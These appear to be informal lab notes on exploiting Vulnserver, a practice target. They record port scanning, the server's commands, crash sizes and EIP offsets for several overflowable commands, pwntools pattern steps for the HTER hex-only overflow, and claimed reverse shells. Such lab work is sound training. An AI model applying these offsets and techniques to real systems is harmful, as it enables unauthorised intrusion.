1===>>  info gethering
      a) $ nmap -p- <ip>
      port==> 9999
      
      b) $nc -v <ip> <port>
      on HELP
      
      get few parameters(command)
      STATS [stat_value]
      RTIME [rtime_value]
      LTIME [ltime_value]
      SRUN [srun_value]
      TRUN [trun_value]
      GMON [gmon_value]
      GDOG [gdog_value]
      KSTET [kstet_value]
      GTER [gter_value]
      HTER [hter_value]
      LTER [lter_value]
      KSTAN [lstan_value]
      
      
      
2===>  Vulnerable commands ==>
        1==> KSTET 
             crashpoint 10x7 bytes = 70     ==> ==> ==> Exploit needed Egghunter, ***Developed , but not varified                                     *
             offset : 70                                {(kernel-syscall   \xcd\x2e    can't work inside wine)}
        2==> GTER 
             size 20x8=160                  ==> ==> ==> exploit needed Egghunter, ***Developed , but not varified                                     *
             offset : 107                               {(kernel-syscall   \xcd\x2e    can't work inside wine)}
                                                       
             
        3==> HTER 
             size 300x7=2100               ==> ==> ==> * Direct use sent data in register without converting in of ASCII encodes; 
                                                                                                                << Gives Reverse shell : SUCCESS >>   ***
                                                       *** custom pattern should be used :::: pwd;pip
                                                       >>> python -i
                                                       >>> from pwn import cyclic
                                                       >>> cyclic(length=5000, alphabet = "12356789ABCDEF")
                                                       ==> get the pattern ; send and get D913D813 
                                                       ==> break in D9 13 D8 13 ; reverse it to 13 D8 13 D9
                                                       ==> find offset  
                                                       >>> cyclic_find("13D813D9", alphabet = "12356789ABCDEF")
                                                       ==> ==> offset is : 2041
                                                       ==> send "A"*2041 + "BCDEFBCD"  *** only HEX Chars 
                                                       ==> on EIP that place as   CD FB DE CB     ==> REVERSED IN 2CHAR GROUP
                                                       ==> now have to place jmp_esp but without making ASCII rep; just reverse it only
                                                       ==> use -f hex ; hex format payload
                                                       
        
        4==> "TRUN ."                      
             size 100x19=1900              ==> offset : 2006 &  buffer size must be > 4000 to write on EIP , << Gives non broking shell : SUCCESS >>   *** *
             
        5 ==> "LTER ."                     
             size 100x20 = 2000            ==> offset : 2006 & varified    >>>> failed to write exploit: <<< SEH >>>
             
           
        6 ==> "GMON /"
              size 150x27 = 4050 byte      ==>==> offset : 2006 &  buffer size must be > 4000 to write on EIP , << Gives non broking shell : SUCCESS >> *** *


3===>   

      
